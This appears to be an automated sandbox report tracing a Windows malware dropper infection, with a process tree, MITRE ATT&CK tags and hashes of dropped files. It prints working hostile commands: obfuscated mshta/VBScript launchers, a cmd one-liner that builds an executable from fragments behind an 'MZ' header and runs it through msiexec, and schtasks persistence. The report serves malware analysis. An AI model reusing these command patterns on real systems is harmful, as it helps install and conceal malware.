C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "dsx8NSUe9OeszftG2KwTJZCm.exe"8⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\Idgt2_xevoseMbjWCCJmG_Xz.exe"C:\Users\Admin\Pictures\Adobe Films\Idgt2_xevoseMbjWCCJmG_Xz.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0HP6I.tmp\Idgt2_xevoseMbjWCCJmG_Xz.tmp"C:\Users\Admin\AppData\Local\Temp\is-0HP6I.tmp\Idgt2_xevoseMbjWCCJmG_Xz.tmp" /SL5="$60068,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Idgt2_xevoseMbjWCCJmG_Xz.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-85LOH.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-85LOH.tmp\ShareFolder.exe" /S /UID=27097⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\7-Zip\EOALRBGJQO\foldershare.exe"C:\Program Files\7-Zip\EOALRBGJQO\foldershare.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\bf-e92db-61e-78a80-82ed9679e898c\Hedejaefygi.exe"C:\Users\Admin\AppData\Local\Temp\bf-e92db-61e-78a80-82ed9679e898c\Hedejaefygi.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\25-5fae4-9af-dcaad-013b8016cfd5e\Haewebujegi.exe"C:\Users\Admin\AppData\Local\Temp\25-5fae4-9af-dcaad-013b8016cfd5e\Haewebujegi.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgsefknz.0h3\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\pgsefknz.0h3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pgsefknz.0h3\GcleanerEU.exe /eufive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubzesb55.jzu\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ubzesb55.jzu\installer.exeC:\Users\Admin\AppData\Local\Temp\ubzesb55.jzu\installer.exe /qn CAMPAIGN="654"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exeC:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exe"C:\Users\Admin\AppData\Local\Temp\mgma4dez.x2u\any.exe" -u11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypaqv5xd.kxo\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ypaqv5xd.kxo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ypaqv5xd.kxo\gcleaner.exe /mixfive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4te2phkm.hoy\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\Pictures\Adobe Films\17t81FuvdBMrcTNzilmgcRH1.exe"C:\Users\Admin\Pictures\Adobe Films\17t81FuvdBMrcTNzilmgcRH1.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HBH2O.tmp\17t81FuvdBMrcTNzilmgcRH1.tmp"C:\Users\Admin\AppData\Local\Temp\is-HBH2O.tmp\17t81FuvdBMrcTNzilmgcRH1.tmp" /SL5="$5007A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\17t81FuvdBMrcTNzilmgcRH1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-7E20B.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-7E20B.tmp\ShareFolder.exe" /S /UID=27107⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Internet Explorer\WPKGUAPMAT\foldershare.exe"C:\Program Files\Internet Explorer\WPKGUAPMAT\foldershare.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\9d-4067f-594-e62b0-34d592b46c428\Qyjunukyfi.exe"C:\Users\Admin\AppData\Local\Temp\9d-4067f-594-e62b0-34d592b46c428\Qyjunukyfi.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\95-8d5fe-0b2-c569b-61b1b3b65db3b\Vashaezhufeho.exe"C:\Users\Admin\AppData\Local\Temp\95-8d5fe-0b2-c569b-61b1b3b65db3b\Vashaezhufeho.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0bmised5.z0b\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\0bmised5.z0b\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\0bmised5.z0b\GcleanerEU.exe /eufive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lmrzwore.300\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\lmrzwore.300\installer.exeC:\Users\Admin\AppData\Local\Temp\lmrzwore.300\installer.exe /qn CAMPAIGN="654"10⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lmrzwore.300\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lmrzwore.300\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635407756 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exeC:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exe"C:\Users\Admin\AppData\Local\Temp\ej2vd3d1.325\any.exe" -u11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tugejwv2.puv\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\tugejwv2.puv\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\tugejwv2.puv\gcleaner.exe /mixfive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cr4q0ux4.ecw\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe"C:\Users\Admin\Pictures\Adobe Films\GzXwQLrWQrUilTPBbe4MHVGz.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffba9f4dec0,0x7ffba9f4ded0,0x7ffba9f4dee08⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --mojo-platform-channel-handle=1768 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1580 /prefetch:28⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2536 /prefetch:18⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2016 /prefetch:18⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --mojo-platform-channel-handle=2124 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3292 /prefetch:28⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,15590274192814082104,16908893868948649954,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3032_1882510266" --mojo-platform-channel-handle=1580 /prefetch:88⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\jrRTQ4OfEZSYNWyLy6P_8o7p.exe"C:\Users\Admin\Pictures\Adobe Films\jrRTQ4OfEZSYNWyLy6P_8o7p.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 6604⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 6764⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 7004⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 8484⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 11244⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 11004⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\inU854R6rROYiSJmh8xYxToM.exe"C:\Users\Admin\Pictures\Adobe Films\inU854R6rROYiSJmh8xYxToM.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 9764⤵
- Program crash
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\peVZ_JD1pJ9rKZUC5V1uN9_H.exe"3⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 69C4F61712EDDBB5A2C5AA7C5D5D455E C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 80A81C9A70E2001A3E6093219B4680652⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- Install Root Certificate (1)
Downloads
-
C:\ProgramData\freebl3.dll
MD5 ef2834ac4ee7d6724f255beaf527e635
SHA1 5be8c1e73a21b49f353c2ecfa4108e43a883cb7b
SHA256 a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba
SHA512 c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2
-
C:\ProgramData\mozglue.dll
MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
C:\ProgramData\msvcp140.dll
MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
C:\ProgramData\nss3.dll
MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
C:\ProgramData\softokn3.dll
MD5 a2ee53de9167bf0d6c019303b7ca84e5
SHA1 2a3c737fa1157e8483815e98b666408a18c0db42
SHA256 43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083
SHA512 45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8
-
C:\ProgramData\vcruntime140.dll
MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5 3da143b1185c281cafb9ef244908b40a
SHA1 f6b47f26dde34437fe25664fcb7c7032f35aa126
SHA256 eaf7b3a17c44e3a88447ca8dc694e995a7a030ecb5791481679d4b765c9a6e90
SHA512 8f75205ff05208e8ba7cda4487774e5f963f4218b6f08e67ad028839329c96f02883dfd957b8411e7f667568cfe67e9105af42e8c5040d65ee53c96adc931432
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5 3298e8cfcea3df879e8ea1387ce6ebe5
SHA1 5ccdfc6fd761cc13ba20c1a172eca4c6eeb86774
SHA256 f3aa176da36ca47c05cd115eef11fe83e46cd7d845e8813d5f678e94ae4bff13
SHA512 24ff2401ae1d60af2b744fdd42cbcdf2b947530111e81f30781bf6b514602d9b6db9c01b97dba7d75499076bcb6aa3bf0b1bf0fdacf63a60dac3ae48d171d28f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5 c8bf5547d2a02ae25cbb556fbd1e9b8d
SHA1 df19fd6ee0d2d46eaa8537eaa87e097165158e8c
SHA256 c4ef045f5bf4f161f0e080efb3cc76246150b62efef5d2a4326bdbbbd61c5b9e
SHA512 7ce2dc4c4272f47065004f0b2f12a512c1a368e51ac85f61c17c0e6781ccab94d976a9c25c132de1aca986ebb53af0c25161ae051a82a4163819b39b89f0418d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5 5e7200dd72d4550104590374295fb116
SHA1 4f51eec54629be2c885f2922ec4c3e712d6c6670
SHA256 cbf3054307bb4e6bb865a352665b09f6c1c822184c0a7b1e21914942bf081a6a
SHA512 08aa0b01e79000902e4baba365f5aeb07ee936d33e35b0570b29ab042521cc560421af7d78adc34ec7e8f7dc67f581fe39c6c05ce222186c886aded8d3819471
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5 9f73c646e5f8e43df0048ec7d12ecff4
SHA1 a926612933ce37cfc8051b55194c23705dd43de4
SHA256 d70d3c208510965c7d75772c904fb4f7de3232d5abbe7ca195c2066b9049df8d
SHA512 028f258dffc87299c8ef60b87df2cb113b4be9810c0d4a74f70044915e89e245133a61ddc35ad02376264ae5b69c2cfb5fb89a82fd8c64fa9f4e22b756a9badb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5 210d76227a2da80a425a92d258f1ee72
SHA1 e1ad6d36627c41ae395a7a23676cc82fcc58884a
SHA256 c185df65500f2e511ee2e216b44081c7a6a6580d4398703c5641892a833da8d7
SHA512 184f2ef3fb4ea292f0bf00b0bec89e57a14957a544254836bb16a33ab372d1d269a7300469f64d45271daf46ee39f421c584156f9b241e31c7d6e2c8e68e2984
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5 939e7295bc60a6dfab57d00cea53ea83
SHA1 ee7089480af325fd09a29b34c4b49cfaf89e41bb
SHA256 0d44cf0d1d92afc47dcf50220f4bcaae2994e84609f828d2ab754a01354b119b
SHA512 e19e3ee35a8b633687c82f6ba190c361806a22d750e861d0fcb8f364839dbd80212e9a2e2bb866de838ec55cd2b5f3d0cff04e5380c88c27273b2598cc3a1815
-
C:\Users\Admin\AppData\Local\Temp\is-0HP6I.tmp\Idgt2_xevoseMbjWCCJmG_Xz.tmp
MD5 e7d905cff7faa817288402f3328591ec
SHA1 77791acaf2b5b8fe8f0af85ef0b2f90bcbc2f5b7
SHA256 79dada84512d378f6b09072b09600bc24fca2f689bf7c3cdb57db5d734e96627
SHA512 3374800b83b4d371027251e87785ca8f8faee5e7faec11498f0838c3cc7ff9ee764529601393cb2cab2be48fd8c2c93e27b5aa61d094366169223a7ed4586162
-
